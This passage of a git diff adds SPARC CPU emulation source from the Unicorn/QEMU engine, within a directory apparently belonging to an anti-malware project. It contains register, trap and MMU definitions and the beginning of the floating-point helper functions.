TARGET_PAGE_BITS 13 /* 8k */ +#define TARGET_PHYS_ADDR_SPACE_BITS 41 +# ifdef TARGET_ABI32 +# define TARGET_VIRT_ADDR_SPACE_BITS 32 +# else +# define TARGET_VIRT_ADDR_SPACE_BITS 44 +# endif +#endif + +#define CPUArchState struct CPUSPARCState + +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define TARGET_HAS_ICE 1 + +#if !defined(TARGET_SPARC64) +#define ELF_MACHINE EM_SPARC +#else +#define ELF_MACHINE EM_SPARCV9 +#endif + +/*#define EXCP_INTERRUPT 0x100*/ + +/* trap definitions */ +#ifndef TARGET_SPARC64 +#define TT_TFAULT 0x01 +#define TT_ILL_INSN 0x02 +#define TT_PRIV_INSN 0x03 +#define TT_NFPU_INSN 0x04 +#define TT_WIN_OVF 0x05 +#define TT_WIN_UNF 0x06 +#define TT_UNALIGNED 0x07 +#define TT_FP_EXCP 0x08 +#define TT_DFAULT 0x09 +#define TT_TOVF 0x0a +#define TT_EXTINT 0x10 +#define TT_CODE_ACCESS 0x21 +#define TT_UNIMP_FLUSH 0x25 +#define TT_DATA_ACCESS 0x29 +#define TT_DIV_ZERO 0x2a +#define TT_NCP_INSN 0x24 +#define TT_TRAP 0x80 +#else +#define TT_POWER_ON_RESET 0x01 +#define TT_TFAULT 0x08 +#define TT_CODE_ACCESS 0x0a +#define TT_ILL_INSN 0x10 +#define TT_UNIMP_FLUSH TT_ILL_INSN +#define TT_PRIV_INSN 0x11 +#define TT_NFPU_INSN 0x20 +#define TT_FP_EXCP 0x21 +#define TT_TOVF 0x23 +#define TT_CLRWIN 0x24 +#define TT_DIV_ZERO 0x28 +#define TT_DFAULT 0x30 +#define TT_DATA_ACCESS 0x32 +#define TT_UNALIGNED 0x34 +#define TT_PRIV_ACT 0x37 +#define TT_EXTINT 0x40 +#define TT_IVEC 0x60 +#define TT_TMISS 0x64 +#define TT_DMISS 0x68 +#define TT_DPROT 0x6c +#define TT_SPILL 0x80 +#define TT_FILL 0xc0 +#define TT_WOTHER (1 << 5) +#define TT_TRAP 0x100 +#endif + +#define PSR_NEG_SHIFT 23 +#define PSR_NEG (1 << PSR_NEG_SHIFT) +#define PSR_ZERO_SHIFT 22 +#define PSR_ZERO (1 << PSR_ZERO_SHIFT) +#define PSR_OVF_SHIFT 21 +#define PSR_OVF (1 << PSR_OVF_SHIFT) +#define PSR_CARRY_SHIFT 20 +#define PSR_CARRY (1 << PSR_CARRY_SHIFT) +#define PSR_ICC (PSR_NEG|PSR_ZERO|PSR_OVF|PSR_CARRY) +#if !defined(TARGET_SPARC64) +#define PSR_EF (1<<12) +#define PSR_PIL 0xf00 +#define PSR_S (1<<7) +#define PSR_PS (1<<6) +#define PSR_ET (1<<5) +#define PSR_CWP 0x1f +#endif + +#define CC_SRC (env->cc_src) +#define CC_SRC2 (env->cc_src2) +#define CC_DST (env->cc_dst) +#define CC_OP (env->cc_op) + +enum { + CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ + CC_OP_FLAGS, /* all cc are back in status register */ + CC_OP_DIV, /* modify N, Z and V, C = 0*/ + CC_OP_ADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_ADDX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TADDTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ + CC_OP_SUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_SUBX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TSUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TSUBTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ + CC_OP_LOGIC, /* modify N and Z, C = V = 0, CC_DST = res */ + CC_OP_NB, +}; + +/* Trap base register */ +#define TBR_BASE_MASK 0xfffff000 + +#if defined(TARGET_SPARC64) +#define PS_TCT (1<<12) /* UA2007, impl.dep. trap on control transfer */ +#define PS_IG (1<<11) /* v9, zero on UA2007 */ +#define PS_MG (1<<10) /* v9, zero on UA2007 */ +#define PS_CLE (1<<9) /* UA2007 */ +#define PS_TLE (1<<8) /* UA2007 */ +#define PS_RMO (1<<7) +#define PS_RED (1<<5) /* v9, zero on UA2007 */ +#define PS_PEF (1<<4) /* enable fpu */ +#define PS_AM (1<<3) /* address mask */ +#define PS_PRIV (1<<2) +#define PS_IE (1<<1) +#define PS_AG (1<<0) /* v9, zero on UA2007 */ + +#define FPRS_FEF (1<<2) + +#define HS_PRIV (1<<2) +#endif + +/* Fcc */ +#define FSR_RD1 (1ULL << 31) +#define FSR_RD0 (1ULL << 30) +#define FSR_RD_MASK (FSR_RD1 | FSR_RD0) +#define FSR_RD_NEAREST 0 +#define FSR_RD_ZERO FSR_RD0 +#define FSR_RD_POS FSR_RD1 +#define FSR_RD_NEG (FSR_RD1 | FSR_RD0) + +#define FSR_NVM (1ULL << 27) +#define FSR_OFM (1ULL << 26) +#define FSR_UFM (1ULL << 25) +#define FSR_DZM (1ULL << 24) +#define FSR_NXM (1ULL << 23) +#define FSR_TEM_MASK (FSR_NVM | FSR_OFM | FSR_UFM | FSR_DZM | FSR_NXM) + +#define FSR_NVA (1ULL << 9) +#define FSR_OFA (1ULL << 8) +#define FSR_UFA (1ULL << 7) +#define FSR_DZA (1ULL << 6) +#define FSR_NXA (1ULL << 5) +#define FSR_AEXC_MASK (FSR_NVA | FSR_OFA | FSR_UFA | FSR_DZA | FSR_NXA) + +#define FSR_NVC (1ULL << 4) +#define FSR_OFC (1ULL << 3) +#define FSR_UFC (1ULL << 2) +#define FSR_DZC (1ULL << 1) +#define FSR_NXC (1ULL << 0) +#define FSR_CEXC_MASK (FSR_NVC | FSR_OFC | FSR_UFC | FSR_DZC | FSR_NXC) + +#define FSR_FTT2 (1ULL << 16) +#define FSR_FTT1 (1ULL << 15) +#define FSR_FTT0 (1ULL << 14) +//gcc warns about constant overflow for ~FSR_FTT_MASK +//#define FSR_FTT_MASK (FSR_FTT2 | FSR_FTT1 | FSR_FTT0) +#ifdef TARGET_SPARC64 +#define FSR_FTT_NMASK 0xfffffffffffe3fffULL +#define FSR_FTT_CEXC_NMASK 0xfffffffffffe3fe0ULL +#define FSR_LDFSR_OLDMASK 0x0000003f000fc000ULL +#define FSR_LDXFSR_MASK 0x0000003fcfc00fffULL +#define FSR_LDXFSR_OLDMASK 0x00000000000fc000ULL +#else +#define FSR_FTT_NMASK 0xfffe3fffULL +#define FSR_FTT_CEXC_NMASK 0xfffe3fe0ULL +#define FSR_LDFSR_OLDMASK 0x000fc000ULL +#endif +#define FSR_LDFSR_MASK 0xcfc00fffULL +#define FSR_FTT_IEEE_EXCP (1ULL << 14) +#define FSR_FTT_UNIMPFPOP (3ULL << 14) +#define FSR_FTT_SEQ_ERROR (4ULL << 14) +#define FSR_FTT_INVAL_FPR (6ULL << 14) + +#define FSR_FCC1_SHIFT 11 +#define FSR_FCC1 (1ULL << FSR_FCC1_SHIFT) +#define FSR_FCC0_SHIFT 10 +#define FSR_FCC0 (1ULL << FSR_FCC0_SHIFT) + +/* MMU */ +#define MMU_E (1<<0) +#define MMU_NF (1<<1) + +#define PTE_ENTRYTYPE_MASK 3 +#define PTE_ACCESS_MASK 0x1c +#define PTE_ACCESS_SHIFT 2 +#define PTE_PPN_SHIFT 7 +#define PTE_ADDR_MASK 0xffffff00 + +#define PG_ACCESSED_BIT 5 +#define PG_MODIFIED_BIT 6 +#define PG_CACHE_BIT 7 + +#define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) +#define PG_MODIFIED_MASK (1 << PG_MODIFIED_BIT) +#define PG_CACHE_MASK (1 << PG_CACHE_BIT) + +/* 3 <= NWINDOWS <= 32. */ +#define MIN_NWINDOWS 3 +#define MAX_NWINDOWS 32 + +#if !defined(TARGET_SPARC64) +#define NB_MMU_MODES 2 +#else +#define NB_MMU_MODES 6 +typedef struct trap_state { + uint64_t tpc; + uint64_t tnpc; + uint64_t tstate; + uint32_t tt; +} trap_state; +#endif + +typedef struct sparc_def_t { + const char *name; + target_ulong iu_version; + uint32_t fpu_version; + uint32_t mmu_version; + uint32_t mmu_bm; + uint32_t mmu_ctpr_mask; + uint32_t mmu_cxr_mask; + uint32_t mmu_sfsr_mask; + uint32_t mmu_trcr_mask; + uint32_t mxcc_version; + uint32_t features; + uint32_t nwindows; + uint32_t maxtl; +} sparc_def_t; + +#define CPU_FEATURE_FLOAT (1 << 0) +#define CPU_FEATURE_FLOAT128 (1 << 1) +#define CPU_FEATURE_SWAP (1 << 2) +#define CPU_FEATURE_MUL (1 << 3) +#define CPU_FEATURE_DIV (1 << 4) +#define CPU_FEATURE_FLUSH (1 << 5) +#define CPU_FEATURE_FSQRT (1 << 6) +#define CPU_FEATURE_FMUL (1 << 7) +#define CPU_FEATURE_VIS1 (1 << 8) +#define CPU_FEATURE_VIS2 (1 << 9) +#define CPU_FEATURE_FSMULD (1 << 10) +#define CPU_FEATURE_HYPV (1 << 11) +#define CPU_FEATURE_CMT (1 << 12) +#define CPU_FEATURE_GL (1 << 13) +#define CPU_FEATURE_TA0_SHUTDOWN (1 << 14) /* Shutdown on "ta 0x0" */ +#define CPU_FEATURE_ASR17 (1 << 15) +#define CPU_FEATURE_CACHE_CTRL (1 << 16) +#define CPU_FEATURE_POWERDOWN (1 << 17) +#define CPU_FEATURE_CASA (1 << 18) + +#ifndef TARGET_SPARC64 +#define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ + CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ + CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ + CPU_FEATURE_FMUL | CPU_FEATURE_FSMULD) +#else +#define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ + CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ + CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ + CPU_FEATURE_FMUL | CPU_FEATURE_VIS1 | \ + CPU_FEATURE_VIS2 | CPU_FEATURE_FSMULD | \ + CPU_FEATURE_CASA) +enum { + mmu_us_12, // Ultrasparc < III (64 entry TLB) + mmu_us_3, // Ultrasparc III (512 entry TLB) + mmu_us_4, // Ultrasparc IV (several TLBs, 32 and 256MB pages) + mmu_sun4v, // T1, T2 +}; +#endif + +#define TTE_VALID_BIT (1ULL << 63) +#define TTE_NFO_BIT (1ULL << 60) +#define TTE_USED_BIT (1ULL << 41) +#define TTE_LOCKED_BIT (1ULL << 6) +#define TTE_SIDEEFFECT_BIT (1ULL << 3) +#define TTE_PRIV_BIT (1ULL << 2) +#define TTE_W_OK_BIT (1ULL << 1) +#define TTE_GLOBAL_BIT (1ULL << 0) + +#define TTE_IS_VALID(tte) ((tte) & TTE_VALID_BIT) +#define TTE_IS_NFO(tte) ((tte) & TTE_NFO_BIT) +#define TTE_IS_USED(tte) ((tte) & TTE_USED_BIT) +#define TTE_IS_LOCKED(tte) ((tte) & TTE_LOCKED_BIT) +#define TTE_IS_SIDEEFFECT(tte) ((tte) & TTE_SIDEEFFECT_BIT) +#define TTE_IS_PRIV(tte) ((tte) & TTE_PRIV_BIT) +#define TTE_IS_W_OK(tte) ((tte) & TTE_W_OK_BIT) +#define TTE_IS_GLOBAL(tte) ((tte) & TTE_GLOBAL_BIT) + +#define TTE_SET_USED(tte) ((tte) |= TTE_USED_BIT) +#define TTE_SET_UNUSED(tte) ((tte) &= ~TTE_USED_BIT) + +#define TTE_PGSIZE(tte) (((tte) >> 61) & 3ULL) +#define TTE_PA(tte) ((tte) & 0x1ffffffe000ULL) + +#define SFSR_NF_BIT (1ULL << 24) /* JPS1 NoFault */ +#define SFSR_TM_BIT (1ULL << 15) /* JPS1 TLB Miss */ +#define SFSR_FT_VA_IMMU_BIT (1ULL << 13) /* USIIi VA out of range (IMMU) */ +#define SFSR_FT_VA_DMMU_BIT (1ULL << 12) /* USIIi VA out of range (DMMU) */ +#define SFSR_FT_NFO_BIT (1ULL << 11) /* NFO page access */ +#define SFSR_FT_ILL_BIT (1ULL << 10) /* illegal LDA/STA ASI */ +#define SFSR_FT_ATOMIC_BIT (1ULL << 9) /* atomic op on noncacheable area */ +#define SFSR_FT_NF_E_BIT (1ULL << 8) /* NF access on side effect area */ +#define SFSR_FT_PRIV_BIT (1ULL << 7) /* privilege violation */ +#define SFSR_PR_BIT (1ULL << 3) /* privilege mode */ +#define SFSR_WRITE_BIT (1ULL << 2) /* write access mode */ +#define SFSR_OW_BIT (1ULL << 1) /* status overwritten */ +#define SFSR_VALID_BIT (1ULL << 0) /* status valid */ + +#define SFSR_ASI_SHIFT 16 /* 23:16 ASI value */ +#define SFSR_ASI_MASK (0xffULL << SFSR_ASI_SHIFT) +#define SFSR_CT_PRIMARY (0ULL << 4) /* 5:4 context type */ +#define SFSR_CT_SECONDARY (1ULL << 4) +#define SFSR_CT_NUCLEUS (2ULL << 4) +#define SFSR_CT_NOTRANS (3ULL << 4) +#define SFSR_CT_MASK (3ULL << 4) + +/* Leon3 cache control */ + +/* Cache control: emulate the behavior of cache control registers but without + any effect on the emulated */ + +#define CACHE_STATE_MASK 0x3 +#define CACHE_DISABLED 0x0 +#define CACHE_FROZEN 0x1 +#define CACHE_ENABLED 0x3 + +/* Cache Control register fields */ + +#define CACHE_CTRL_IF (1 << 4) /* Instruction Cache Freeze on Interrupt */ +#define CACHE_CTRL_DF (1 << 5) /* Data Cache Freeze on Interrupt */ +#define CACHE_CTRL_DP (1 << 14) /* Data cache flush pending */ +#define CACHE_CTRL_IP (1 << 15) /* Instruction cache flush pending */ +#define CACHE_CTRL_IB (1 << 16) /* Instruction burst fetch */ +#define CACHE_CTRL_FI (1 << 21) /* Flush Instruction cache (Write only) */ +#define CACHE_CTRL_FD (1 << 22) /* Flush Data cache (Write only) */ +#define CACHE_CTRL_DS (1 << 23) /* Data cache snoop enable */ + +typedef struct SparcTLBEntry { + uint64_t tag; + uint64_t tte; +} SparcTLBEntry; + +struct CPUTimer +{ + const char *name; + uint32_t frequency; + uint32_t disabled; + uint64_t disabled_mask; + int64_t clock_offset; + QEMUTimer *qtimer; +}; + +typedef struct CPUTimer CPUTimer; + +struct QEMUFile; +void cpu_put_timer(struct QEMUFile *f, CPUTimer *s); +void cpu_get_timer(struct QEMUFile *f, CPUTimer *s); + +typedef struct CPUSPARCState CPUSPARCState; + +struct CPUSPARCState { + target_ulong gregs[8]; /* general registers */ + target_ulong *regwptr; /* pointer to current register window */ + target_ulong pc; /* program counter */ + target_ulong npc; /* next program counter */ + target_ulong y; /* multiply/divide register */ + + /* emulator internal flags handling */ + target_ulong cc_src, cc_src2; + target_ulong cc_dst; + uint32_t cc_op; + + target_ulong cond; /* conditional branch result (XXX: save it in a + temporary register when possible) */ + + uint32_t psr; /* processor state register */ + target_ulong fsr; /* FPU state register */ + CPU_DoubleU fpr[TARGET_DPREGS]; /* floating point registers */ + uint32_t cwp; /* index of current register window (extracted + from PSR) */ +#if !defined(TARGET_SPARC64) || defined(TARGET_ABI32) + uint32_t wim; /* window invalid mask */ +#endif + target_ulong tbr; /* trap base register */ +#if !defined(TARGET_SPARC64) + int psrs; /* supervisor mode (extracted from PSR) */ + int psrps; /* previous supervisor mode */ + int psret; /* enable traps */ +#endif + uint32_t psrpil; /* interrupt blocking level */ + uint32_t pil_in; /* incoming interrupt level bitmap */ +#if !defined(TARGET_SPARC64) + int psref; /* enable fpu */ +#endif + int interrupt_index; + /* NOTE: we allow 8 more registers to handle wrapping */ + target_ulong regbase[MAX_NWINDOWS * 16 + 8]; + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. */ + target_ulong version; + uint32_t nwindows; + + /* MMU regs */ +#if defined(TARGET_SPARC64) + uint64_t lsu; +#define DMMU_E 0x8 +#define IMMU_E 0x4 + //typedef struct SparcMMU + union { + uint64_t immuregs[16]; + struct { + uint64_t tsb_tag_target; + uint64_t unused_mmu_primary_context; // use DMMU + uint64_t unused_mmu_secondary_context; // use DMMU + uint64_t sfsr; + uint64_t sfar; + uint64_t tsb; + uint64_t tag_access; + } immu; + }; + union { + uint64_t dmmuregs[16]; + struct { + uint64_t tsb_tag_target; + uint64_t mmu_primary_context; + uint64_t mmu_secondary_context; + uint64_t sfsr; + uint64_t sfar; + uint64_t tsb; + uint64_t tag_access; + } dmmu; + }; + SparcTLBEntry itlb[64]; + SparcTLBEntry dtlb[64]; + uint32_t mmu_version; +#else + uint32_t mmuregs[32]; + uint64_t mxccdata[4]; + uint64_t mxccregs[8]; + uint32_t mmubpctrv, mmubpctrc, mmubpctrs; + uint64_t mmubpaction; + uint64_t mmubpregs[4]; + uint64_t prom_addr; +#endif + /* temporary float registers */ + float128 qt0, qt1; + float_status fp_status; +#if defined(TARGET_SPARC64) +#define MAXTL_MAX 8 +#define MAXTL_MASK (MAXTL_MAX - 1) + trap_state ts[MAXTL_MAX]; + uint32_t xcc; /* Extended integer condition codes */ + uint32_t asi; + uint32_t pstate; + uint32_t tl; + uint32_t maxtl; + uint32_t cansave, canrestore, otherwin, wstate, cleanwin; + uint64_t agregs[8]; /* alternate general registers */ + uint64_t bgregs[8]; /* backup for normal global registers */ + uint64_t igregs[8]; /* interrupt general registers */ + uint64_t mgregs[8]; /* mmu general registers */ + uint64_t fprs; + uint64_t tick_cmpr, stick_cmpr; + CPUTimer *tick, *stick; +#define TICK_NPT_MASK 0x8000000000000000ULL +#define TICK_INT_DIS 0x8000000000000000ULL + uint64_t gsr; + uint32_t gl; // UA2005 + /* UA 2005 hyperprivileged registers */ + uint64_t hpstate, htstate[MAXTL_MAX], hintp, htba, hver, hstick_cmpr, ssr; + CPUTimer *hstick; // UA 2005 + /* Interrupt vector registers */ + uint64_t ivec_status; + uint64_t ivec_data[3]; + uint32_t softint; +#define SOFTINT_TIMER 1 +#define SOFTINT_STIMER (1 << 16) +#define SOFTINT_INTRMASK (0xFFFE) +#define SOFTINT_REG_MASK (SOFTINT_STIMER|SOFTINT_INTRMASK|SOFTINT_TIMER) +#endif + sparc_def_t *def; + + //void *irq_manager; + //void (*qemu_irq_ack)(CPUSPARCState *env, void *irq_manager, int intno); + + /* Leon3 cache control */ + uint32_t cache_control; + + // Unicorn engine + struct uc_struct *uc; +}; + +#include "cpu-qom.h" + +#ifndef NO_CPU_IO_DEFS +/* cpu_init.c */ +SPARCCPU *cpu_sparc_init(struct uc_struct *uc, const char *cpu_model); +void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu); +void sparc_cpu_list(FILE *f, fprintf_function cpu_fprintf); +/* mmu_helper.c */ +int sparc_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); +target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev); +void dump_mmu(FILE *f, fprintf_function cpu_fprintf, CPUSPARCState *env); + +#if !defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) +int sparc_cpu_memory_rw_debug(CPUState *cpu, vaddr addr, + uint8_t *buf, int len, bool is_write); +#endif + + +/* translate.c */ +void gen_intermediate_code_init(CPUSPARCState *env); + +/* cpu-exec.c */ +int cpu_sparc_exec(struct uc_struct *uc, CPUSPARCState *s); + +/* win_helper.c */ +target_ulong cpu_get_psr(CPUSPARCState *env1); +void cpu_put_psr(CPUSPARCState *env1, target_ulong val); +#ifdef TARGET_SPARC64 +target_ulong cpu_get_ccr(CPUSPARCState *env1); +void cpu_put_ccr(CPUSPARCState *env1, target_ulong val); +target_ulong cpu_get_cwp64(CPUSPARCState *env1); +void cpu_put_cwp64(CPUSPARCState *env1, int cwp); +void cpu_change_pstate(CPUSPARCState *env1, uint32_t new_pstate); +#endif +int cpu_cwp_inc(CPUSPARCState *env1, int cwp); +int cpu_cwp_dec(CPUSPARCState *env1, int cwp); +void cpu_set_cwp(CPUSPARCState *env1, int new_cwp); + +/* int_helper.c */ +void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno); + +/* sun4m.c, sun4u.c */ +void cpu_check_irqs(CPUSPARCState *env); + +/* leon3.c */ +void leon3_irq_ack(void *irq_manager, int intno); + +#if defined (TARGET_SPARC64) + +static inline int compare_masked(uint64_t x, uint64_t y, uint64_t mask) +{ + return (x & mask) == (y & mask); +} + +#define MMU_CONTEXT_BITS 13 +#define MMU_CONTEXT_MASK ((1 << MMU_CONTEXT_BITS) - 1) + +static inline int tlb_compare_context(const SparcTLBEntry *tlb, + uint64_t context) +{ + return compare_masked(context, tlb->tag, MMU_CONTEXT_MASK); +} + +#endif +#endif + +/* cpu-exec.c */ +#if !defined(CONFIG_USER_ONLY) +void sparc_cpu_unassigned_access(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, int is_asi, + unsigned size); +#if defined(TARGET_SPARC64) +hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, + int mmu_idx); +#endif +#endif +int cpu_sparc_signal_handler(int host_signum, void *pinfo, void *puc); + +#ifndef NO_CPU_IO_DEFS +static inline CPUSPARCState *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + SPARCCPU *cpu = cpu_sparc_init(uc, cpu_model); + if (cpu == NULL) { + return NULL; + } + return &cpu->env; +} +#endif + +#define cpu_exec cpu_sparc_exec +#define cpu_gen_code cpu_sparc_gen_code +#define cpu_signal_handler cpu_sparc_signal_handler +#define cpu_list sparc_cpu_list + +#define CPU_SAVE_VERSION 7 + +/* MMU modes definitions */ +#if defined (TARGET_SPARC64) +#define MMU_USER_IDX 0 +#define MMU_MODE0_SUFFIX _user +#define MMU_USER_SECONDARY_IDX 1 +#define MMU_MODE1_SUFFIX _user_secondary +#define MMU_KERNEL_IDX 2 +#define MMU_MODE2_SUFFIX _kernel +#define MMU_KERNEL_SECONDARY_IDX 3 +#define MMU_MODE3_SUFFIX _kernel_secondary +#define MMU_NUCLEUS_IDX 4 +#define MMU_MODE4_SUFFIX _nucleus +#define MMU_HYPV_IDX 5 +#define MMU_MODE5_SUFFIX _hypv +#else +#define MMU_USER_IDX 0 +#define MMU_MODE0_SUFFIX _user +#define MMU_KERNEL_IDX 1 +#define MMU_MODE1_SUFFIX _kernel +#endif + +#if defined (TARGET_SPARC64) +static inline int cpu_has_hypervisor(CPUSPARCState *env1) +{ + return env1->def->features & CPU_FEATURE_HYPV; +} + +static inline int cpu_hypervisor_mode(CPUSPARCState *env1) +{ + return cpu_has_hypervisor(env1) && (env1->hpstate & HS_PRIV); +} + +static inline int cpu_supervisor_mode(CPUSPARCState *env1) +{ + return env1->pstate & PS_PRIV; +} +#endif + +static inline int cpu_mmu_index(CPUSPARCState *env1) +{ +#if defined(CONFIG_USER_ONLY) + return MMU_USER_IDX; +#elif !defined(TARGET_SPARC64) + return env1->psrs; +#else + if (env1->tl > 0) { + return MMU_NUCLEUS_IDX; + } else if (cpu_hypervisor_mode(env1)) { + return MMU_HYPV_IDX; + } else if (cpu_supervisor_mode(env1)) { + return MMU_KERNEL_IDX; + } else { + return MMU_USER_IDX; + } +#endif +} + +static inline int cpu_interrupts_enabled(CPUSPARCState *env1) +{ +#if !defined (TARGET_SPARC64) + if (env1->psret != 0) + return 1; +#else + if (env1->pstate & PS_IE) + return 1; +#endif + + return 0; +} + +static inline int cpu_pil_allowed(CPUSPARCState *env1, int pil) +{ +#if !defined(TARGET_SPARC64) + /* level 15 is non-maskable on sparc v8 */ + return pil == 15 || pil > env1->psrpil; +#else + return pil > env1->psrpil; +#endif +} + +#include "exec/cpu-all.h" + +#ifdef TARGET_SPARC64 +/* sun4u.c */ +void cpu_tick_set_count(CPUTimer *timer, uint64_t count); +uint64_t cpu_tick_get_count(CPUTimer *timer); +void cpu_tick_set_limit(CPUTimer *timer, uint64_t limit); +trap_state* cpu_tsptr(CPUSPARCState* env); +#endif + +#define TB_FLAG_FPU_ENABLED (1 << 4) +#define TB_FLAG_AM_ENABLED (1 << 5) + +static inline void cpu_get_tb_cpu_state(CPUSPARCState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *pc = env->pc; + *cs_base = env->npc; +#ifdef TARGET_SPARC64 + // AM . Combined FPU enable bits . PRIV . DMMU enabled . IMMU enabled + *flags = (env->pstate & PS_PRIV) /* 2 */ + | ((env->lsu & (DMMU_E | IMMU_E)) >> 2) /* 1, 0 */ + | ((env->tl & 0xff) << 8) + | (env->dmmu.mmu_primary_context << 16); /* 16... */ + if (env->pstate & PS_AM) { + *flags |= TB_FLAG_AM_ENABLED; + } + if ((env->def->features & CPU_FEATURE_FLOAT) && (env->pstate & PS_PEF) + && (env->fprs & FPRS_FEF)) { + *flags |= TB_FLAG_FPU_ENABLED; + } +#else + // FPU enable . Supervisor + *flags = env->psrs; + if ((env->def->features & CPU_FEATURE_FLOAT) && env->psref) { + *flags |= TB_FLAG_FPU_ENABLED; + } +#endif +} + +static inline bool tb_fpu_enabled(int tb_flags) +{ +#if defined(CONFIG_USER_ONLY) + return true; +#else + return tb_flags & TB_FLAG_FPU_ENABLED; +#endif +} + +static inline bool tb_am_enabled(int tb_flags) +{ +#ifndef TARGET_SPARC64 + return false; +#else + return tb_flags & TB_FLAG_AM_ENABLED; +#endif +} + +#include "exec/exec-all.h" + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/fop_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/fop_helper.c new file mode 100644 index 0000000..ee4592e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/fop_helper.c @@ -0,0 +1,467 @@ +/* + * FPU op helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +#define QT0 (env->qt0) +#define QT1 (env->qt1) + +static void check_ieee_exceptions(CPUSPARCState *env) +{ + target_ulong status; + + status = get_float_exception_flags(&env->fp_status); + if (status) { + /* Copy IEEE 754 flags into FSR */ + if (status & float_flag_invalid) { + env->fsr |= FSR_NVC; + } + if (status & float_flag_overflow) { + env->fsr |= FSR_OFC; + } + if (status & float_flag_underflow) { + env->fsr |= FSR_UFC; + } + if (status & float_flag_divbyzero) { + env->fsr |= FSR_DZC; + } + if (status & float_flag_inexact) { + env->fsr |= FSR_NXC; + } + + if ((env->fsr & FSR_CEXC_MASK) & ((env->fsr & FSR_TEM_MASK) >> 23)) { + /* Unmasked exception, generate a trap */ + env->fsr |= FSR_FTT_IEEE_EXCP; + helper_raise_exception(env, TT_FP_EXCP); + } else { + /* Accumulate exceptions */ + env->fsr |= (env->fsr & FSR_CEXC_MASK) << 5; + } + } +} + +static inline void clear_float_exceptions(CPUSPARCState *env) +{ + set_float_exception_flags(0, &env->fp_status); +} + +#define F_HELPER(name, p) void helper_f##name##p(CPUSPARCState *env) + +#define F_BINOP(name) \ + float32 helper_f ## name ## s (CPUSPARCState *env, float32 src1, \ + float32 src2) \ + { \ + float32 ret; \ + clear_float_exceptions(env); \ + ret = float32_ ## name (src1, src2, &env->fp_status); \ + check_ieee_exceptions(env); \ + return ret; \ + } \ + float64 helper_f ## name ## d (CPUSPARCState * env, float64 src1,\ + float64 src2) \ + { \ + float64 ret; \ + clear_float_exceptions(env); \ + ret = float64_ ## name (src1, src2, &env->fp_status); \ + check_ieee_exceptions(env); \ + return ret; \ + } \ + F_HELPER(name, q) \ + { \ + clear_float_exceptions(env); \ + QT0 = float128_ ## name (QT0, QT1, &env->fp_status); \ + check_ieee_exceptions(env); \ + } + +F_BINOP(add); +F_BINOP(sub); +F_BINOP(mul); +F_BINOP(div); +#undef F_BINOP + +float64 helper_fsmuld(CPUSPARCState *env, float32 src1, float32 src2) +{ + float64 ret; + clear_float_exceptions(env); + ret = float64_mul(float32_to_float64(src1, &env->fp_status), + float32_to_float64(src2, &env->fp_status), + &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fdmulq(CPUSPARCState *env, float64 src1, float64 src2) +{ + clear_float_exceptions(env); + QT0 = float128_mul(float64_to_float128(src1, &env->fp_status), + float64_to_float128(src2, &env->fp_status), + &env->fp_status); + check_ieee_exceptions(env); +} + +float32 helper_fnegs(float32 src) +{ + return float32_chs(src); +} + +#ifdef TARGET_SPARC64 +float64 helper_fnegd(float64 src) +{ + return float64_chs(src); +} + +F_HELPER(neg, q) +{ + QT0 = float128_chs(QT1); +} +#endif + +/* Integer to float conversion. */ +float32 helper_fitos(CPUSPARCState *env, int32_t src) +{ + /* Inexact error possible converting int to float. */ + float32 ret; + clear_float_exceptions(env); + ret = int32_to_float32(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float64 helper_fitod(CPUSPARCState *env, int32_t src) +{ + /* No possible exceptions converting int to double. */ + return int32_to_float64(src, &env->fp_status); +} + +void helper_fitoq(CPUSPARCState *env, int32_t src) +{ + /* No possible exceptions converting int to long double. */ + QT0 = int32_to_float128(src, &env->fp_status); +} + +#ifdef TARGET_SPARC64 +float32 helper_fxtos(CPUSPARCState *env, int64_t src) +{ + float32 ret; + clear_float_exceptions(env); + ret = int64_to_float32(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float64 helper_fxtod(CPUSPARCState *env, int64_t src) +{ + float64 ret; + clear_float_exceptions(env); + 